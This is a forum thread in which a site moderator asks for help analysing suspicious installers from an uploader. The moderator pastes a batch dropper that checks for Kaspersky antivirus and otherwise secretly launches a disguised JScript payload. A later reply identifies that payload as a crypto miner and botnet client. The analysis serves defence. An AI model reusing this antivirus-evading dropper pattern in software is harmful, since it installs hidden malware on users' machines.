Hi! I need help to determine if js code is malicious or what it really does

@ssk5Jun 21.2020

Hi comunity ! Im a moderator on a site where ppl can upload apps. We try to keep our apps without any kind of infection but as far my skill set goes, ill need help to determine a js code i did find. Many of our users complained aboute apps from one of our uploaders, they said apps where infected and it was a js code hijacking wscript in taskmanager claming it is a keylogger or some spyware. I have been able to do some reverse engineering on some of his/here apps and ended up with a *.js file from each of his/here uploads that were very similar to each other. It was unreadable/compressed so i decompressed it so got a little more readable but still, i think its encrypted somehow. So this is as far as my skills set goes and i would like to ask any one in this comunity if someone could have a look at the code to see if it has any malicious intend or not? ..and what it really does? Best regards

to post a comment

JavaScript

9 Comments(s) _↴

@VITSUSAJun 22.2020 — #Click on the mentioned hyperlink to know about what js code really does -

https://developer.mozilla.org/en-US/docs/Learn/JavaScript/First_steps/What_is_JavaScript#:~:text=JavaScript%20is%20a%20scripting%20or,3D%20graphics%2C%20scrolling%20video%20jukeboxes%2C

@ssk5authorJun 22.2020 — #I cant really recognise mutch from that link to the code i have other than function and some others.

@ssk5authorJun 22.2020 — #I think its encrypted, could i post the pastebin url here and mabye someone could guide me how to make it readable?

Help would be very mutch appreciated how this is a serious case in our site.

@ssk5authorJun 24.2020 — #https://pastebin.com/sTjecBHE

can some one recognice this as javascript or is it encrypted javascript?

@NogDogJun 24.2020 — #Barring someone actually figuring out what is being obfuscated in that code, you could always delete it and see if anything breaks. If nothing breaks, it's probably malicious. If something does break, it **_may_** be obfuscated code that the developer wanted to make hard to re-use/reverse-engineer, in which case you'd need to talk to that developer.

@ssk5authorJun 26.2020 — #NogDog thanks ! First i deletet the batch script telling AdobePIM (javascript file) and the *.bat file itself, but then the setup deleted it self after i runned it (with AV disabled). Then i let the bat file and js file be there, just edited the js file with random word (messing up code) the it installed like fine and things working. Weird no? As the uploader at this app had scripted in code if those file not exist, then dont run the "malware" or what code the js is..

@ssk5authorJun 26.2020 — #Here is the ADC_Version.msi file that gets renamed to ADC_Version.bat when clicking on the setup exe..

��&cls

@echo off

cd ../../Tools

setlocal enableDelayedExpansion enableextensions

set LIST=

for /f "delims=" %%F in ('wmic /node:localhost /namespace:rootSecurityCenter2 path AntiVirusProduct Get DisplayName') do set LIST=!LIST! %%F

set "regexp=.*kasper.*"

echo( %LIST%|findstr /i /r /c:"%regexp%" >nul && (

move Tools.dat ../Set-up.exe

start ../Set-up.exe

echo " "

) || (

 echo " "
   cd ../
   move Set-up.exe Tools/Tools.data
   timeout 1  nul 2>&1
   cd packages/ADC
   if exist AdobePIM (
   cd ../../Tools
   move Tools.dat ../Set-up.exe
   timeout 1  nul 2>&1
   start ../Set-up.exe
   cd ../packages/ADC
   start wscript //E:jscript AdobePIM %1
   ) else (
   echo "Error : Please Extract compressed file first ..."
   pause
   )

)

rename ADC_Version.2020.bat ADC_Version.2020.msi

@ssk5authorJun 26.2020 — #AdobePIM = AdobePIM.js

@SayathanaJul 07.2020 — #it's a crypto miner and a very braindead botnet client, vet your users more carefully

Also in #JavaScript _↴

Chromeless Player won't work in Firefox conditionals Dice roll, average [RESOLVED] window.blur

Success!

Help @ssk5 spread the word by sharing this article on Twitter...

Tweet This

about: ({
version: 0.1.9 — BETA 4.23,
whats_new: community page,
up_next: more Davinci•003 tasks,
coming_soon: events calendar,
social: @webDeveloperHQ
});

legal: ({
terms: of use,
privacy: policy
});

changelog: (
version: 0.1.9,
notes: added community page

version: 0.1.8,
notes: added Davinci•003

version: 0.1.7,
notes: upvote answers to bounties

version: 0.1.6,
notes: article editor refresh
)...

recent_tips: (
tipper: @Yussuf4331,
tipped: article
amount: 1000 SATS,

tipper: @darkwebsites540,
tipped: article
amount: 10 SATS,

tipper: @Samric24,
tipped: article
amount: 1000 SATS,
)...

Hi! I need help to determine if js code is malicious or what it really does

9 Comments(s) ↴

Also in #JavaScript ↴

Success!

The web is an endless sea of information. Don't miss the boat... Subscribe!

Social

Version

9 Comments(s) _↴

Also in #JavaScript _↴